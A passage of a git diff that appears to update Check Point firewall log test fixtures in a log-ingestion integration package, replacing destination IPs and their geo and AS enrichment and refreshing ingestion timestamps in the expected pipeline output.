inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"] +<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36749"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"] -<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"] +<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; description:"Contracts"; product:"Security Gateway/Management"; status:"Started"; update_service:"1"; version:"1.0"] -<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"] +<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"] <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47919"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"] <134>1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"Application Control"; severity:"1"; update_status:"updated"] <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"URL Filtering"; severity:"1"; update_status:"updated"] <134>1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] -<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] +<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50024"; service:"137"; service_id:"nbname"; src:"192.168.1.196"] <134>1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60226"; service:"22"; service_id:"ssh"; src:"192.168.1.205"] diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json index 8d2dc7757c1..0d89f653dc7 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958617400Z", + "ingested": "2021-12-09T13:31:19.083259700Z", "original": "\u003c134\u003e1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"1\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk\"]", "id": "{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}", "category": [ @@ -57,7 +57,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-06-30T09:24:17.958627500Z", + "ingested": "2021-12-09T13:31:19.083263700Z", "original": "\u003c134\u003e1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"2\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"installed Standard\"]", "id": "{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}", "category": [ @@ -126,7 +126,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958635200Z", + "ingested": "2021-12-09T13:31:19.083267900Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"46915\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -152,25 +152,25 @@ }, "destination": { "geo": { - "continent_name": "Asia", - "region_iso_code": "IL-TA", - "city_name": "Tel Aviv", - "country_iso_code": "IL", - "country_name": "Israel", - "region_name": "Tel Aviv", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 34.7647, - "lat": 32.0678 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 25046, + "number": 20712, "organization": { - "name": "Check Point Software Technologies LTD" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 443, - "ip": "194.29.39.10" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" @@ -213,13 +213,13 @@ "related": { "ip": [ "192.168.1.100", - "194.29.39.10" + "81.2.69.144" ] }, "event": { "sequence": 2, - "ingested": "2021-06-30T09:24:17.958642500Z", - "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"194.29.39.10\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61794\"; service:\"443\"; service_id:\"https\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"26680\"; xlatesrc:\"0.0.0.0\"]", + "ingested": "2021-12-09T13:31:19.083271700Z", + "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61794\"; service:\"443\"; service_id:\"https\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"26680\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", "id": "{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}", @@ -287,7 +287,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-06-30T09:24:17.958649800Z", + "ingested": "2021-12-09T13:31:19.083278100Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"36749\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -320,7 +320,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958691800Z", + "ingested": "2021-12-09T13:31:19.083282500Z", "original": "\u003c134\u003e1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}", "category": [ @@ -346,22 +346,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 30148, + "number": 20712, "organization": { - "name": "Sucuri" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "192.124.249.41" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" @@ -404,13 +407,13 @@ "related": { "ip": [ "192.168.1.100", - "192.124.249.41" + "81.2.69.144" ] }, "event": { "sequence": 8, - "ingested": "2021-06-30T09:24:17.958701800Z", - "original": "\u003c134\u003e1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"8\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.124.249.41\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61180\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"10860\"; xlatesrc:\"0.0.0.0\"]", + "ingested": "2021-12-09T13:31:19.083286800Z", + "original": "\u003c134\u003e1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"8\"; version:\"5\"; 